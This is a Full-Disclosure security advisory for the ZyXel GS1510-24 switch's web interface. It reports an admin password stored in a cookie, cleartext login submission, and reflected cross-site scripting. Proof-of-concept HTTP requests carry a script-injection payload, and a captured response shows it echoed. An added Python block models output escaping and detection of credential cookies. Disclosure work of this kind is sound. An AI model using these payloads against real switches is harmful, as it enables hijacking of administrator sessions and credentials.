[Full-disclosure] Multiple vulnerabilities in ZyXel GS1510 web front end



*Advisory Information*

Title: Multiple vulnerabilities in ZyXel GS1510 web front end
Date published: 2012-03-14 12:57:15 AM
upSploit Ref: UPS-2011-0042

*Advisory Summary*

IT Security Geeks have discovered multiple vulnerabilities in the ZyXel
GS1510 24-port Ethernet switch. These are: the Admin password stored in a
Cookie, reflected Cross-Site Scripting (XSS), and clear-text password
submission.

*Vendor*

Zyxel

*Affected Software*

V1.00(BVN.1)

This is the firmware that runs on the ZyXel model GS1510-24 switch.

*Description of Issue*

The GS1510-24 ZyXel switch, running firmware V1.00(BVN.1), is susceptible
to multiple vulnerabilities, all within the management web interface.
They are as follows:

1. The management web interface Cookie contains both the username and the
password for the Admin user to log into the switch.

2. Cleartext submission of password. The page contains a form with the
following action URL, which is submitted over clear-text HTTP:

http://192.168.1.5/webctrl.cgi

The form contains the following password field:

password

3. Cross Site Scripting

The payload fe07b</title><script>alert(xss)</script>b7e71e54af6 was
submitted in the name of an arbitrarily supplied request parameter.

This input was echoed unmodified in the application’s response.

*PoC*

2. Cleartext submission of password.

http://192.168.1.5/webctrl.cgi

Request

GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

3. Cross Site Scripting

The payload fe07b</title><script>alert(1)</script>b7e71e54af6 was
submitted in the name of an arbitrarily supplied request parameter.

This input was echoed unmodified in the application’s response.

This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application’s response.

Request

GET /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1 HTTP/1.1
Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: admin=password123

Response

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 18 Sep 2011 16:30:14 GMT
Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT
Accept-Ranges: bytes
Connection: close

<HTML>
<HEAD><TITLE>Index of /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1</TITLE></HEAD>
<BODY BGCOLOR="#99cc99" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>Index of /images/?fe
...[SNIP]...
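As an added illustration (not part of the advisory or of the switch firmware): a model of the directory-listing behaviour shown in the response above beside an output-encoded version, the reflection test the advisory applies, and a check for cookies named after an account (finding 1). All function names are assumptions; the inputs are constructed from the request and cookie quoted above.

```python
import html
from urllib.parse import unquote

# Constructed inputs modelled on the advisory's request and Cookie header.
PROBE = 'fe07b</title><script>alert(1)</script>b7e71e54af6'
REQUEST_URI = '/images/?' + PROBE + '=1'
COOKIE_HEADER = 'admin=password123'


def render_index_vulnerable(request_uri: str) -> str:
    """Models the observed behaviour: the raw request URI is placed inside
    <TITLE> and <H2> with no encoding, so markup in it becomes live HTML."""
    uri = unquote(request_uri)
    return (f'<HTML><HEAD><TITLE>Index of {uri}</TITLE></HEAD>'
            f'<BODY><H2>Index of {uri}</H2></BODY></HTML>')


def render_index_fixed(request_uri: str) -> str:
    """Hardened form: HTML-escape the URI before it lands in the document,
    so '<', '>', '&' and quotes are rendered as text, never as markup."""
    uri = html.escape(unquote(request_uri), quote=True)
    return (f'<HTML><HEAD><TITLE>Index of {uri}</TITLE></HEAD>'
            f'<BODY><H2>Index of {uri}</H2></BODY></HTML>')


def reflected_unescaped(body: str, probe: str) -> bool:
    """The advisory's test: the probe counts as reflected only if the body
    contains it byte-for-byte, i.e. with its '<' and '>' intact."""
    return probe in body


def credential_cookies(cookie_header: str, account_names=('admin',)) -> list:
    """Return the names of cookies that are literally an account name with a
    non-empty value (the 'admin=<password>' pattern from finding 1)."""
    hits = []
    for pair in cookie_header.split(';'):
        name, _, value = pair.strip().partition('=')
        if name in account_names and value:
            hits.append(name)
    return hits
```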

*Credits*

Neil Fryer/IT Security Geeks

*References*

ZyXel GS1510

*Patch/Fix*

Update to the latest firmware
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/